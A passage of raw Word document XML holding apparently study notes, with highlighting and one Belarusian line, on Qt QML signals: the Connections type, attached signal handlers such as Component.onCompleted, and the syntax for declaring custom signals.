      <w:r w:rsidR="004A141A" w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidR="004A141A" w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>is the name of the property, with the first letter capitalized.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0013467E" w:rsidRPr="00D815C8" w:rsidRDefault="000653FC" w:rsidP="00F15C30">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>In some cases it may be desirable to access a signal outside of the object that emits it. For these purposes, the</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>QtQuick</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>module provides the</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId26" w:history="1">
        <w:r w:rsidRPr="00D815C8">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:highlight w:val="yellow"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Connections</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="003F208F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>type for connecting to signals of arbitrary objects</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>. A</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId27" w:history="1">
        <w:r w:rsidRPr="00D815C8">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Connections</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>object can receive any signal from its specified</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId28" w:anchor="target-prop" w:history="1">
        <w:r w:rsidRPr="00D815C8">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>target</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009277C7" w:rsidRPr="00D815C8" w:rsidRDefault="009277C7" w:rsidP="009277C7">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An</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId29" w:anchor="attached-properties-and-attached-signal-handlers" w:history="1">
        <w:r w:rsidRPr="00D815C8">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>attached signal handler</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>is a signal handler that receives a signal from an</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="404244"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>attaching type</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>rather than the object within which the handler is declared.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009277C7" w:rsidRPr="00D815C8" w:rsidRDefault="009277C7" w:rsidP="009277C7">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For </w:t>
      </w:r>
      <w:r w:rsidRPr="003F208F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>example</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId30" w:anchor="completed-signal" w:history="1">
        <w:r w:rsidRPr="00D815C8">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Component.onCompleted</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>is an attached signal handler. This handler is often used to execute some JavaScript code when its creation process has been completed, as in the example below:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009277C7" w:rsidRPr="00D815C8" w:rsidRDefault="00F969D5" w:rsidP="00F15C30">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>The</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onCompleted</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handler is not responding to some</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completed</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signal from the</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId31" w:history="1">
        <w:r w:rsidRPr="00D815C8">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Rectangle</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type. Instead, an object of the</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Component</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i/>
          <w:iCs/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>attaching type</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with a</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completed</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signal has automatically been</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i/>
          <w:iCs/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>attached</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to the</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId32" w:history="1">
        <w:r w:rsidRPr="00D815C8">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Rectangle</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object by the QML engine, and the engine emits this signal when the object is fully created, thus triggering the</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Component.onCompleted</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signal handler.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D09F3" w:rsidRPr="00D815C8" w:rsidRDefault="00D0445C" w:rsidP="00F15C30">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Attached signal handlers allow objects </w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>to be notified of particular signals that are significant to each individual object</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>. If there was no</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono" w:cs="Courier New"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Component.onCompleted</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>attached signal handler, for example, then an object could not receive this notification without registering for some special signal from some special object. The </w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>attached signal handler</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> mechanism enables objects to receive particular signals without these extra processes.</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shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t>лепей зразумець гэта і выпадкі, калі патрэбны механізм далучаных уласцівасцяў</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D0445C" w:rsidRPr="003F208F" w:rsidRDefault="002A1ACC" w:rsidP="00F15C30">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Signals can be added to custom QML types through the </w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono" w:cs="Courier New"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>signal</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> keyword</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="003F208F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> // </w:t>
      </w:r>
      <w:r w:rsidR="003F208F" w:rsidRPr="003F208F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>syntax</w:t>
      </w:r>
      <w:r w:rsidR="003F208F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> //</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002A1ACC" w:rsidRPr="003F208F" w:rsidRDefault="00EB6C16" w:rsidP="00F15C30">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>signal &lt;name&gt;[([&lt;type&gt; &lt;parameter name&gt;[, ...]])]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EB6C16" w:rsidRPr="00D815C8" w:rsidRDefault="00EB6C16" w:rsidP="00F15C30">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Signal objects have a </w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono" w:cs="Courier New"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
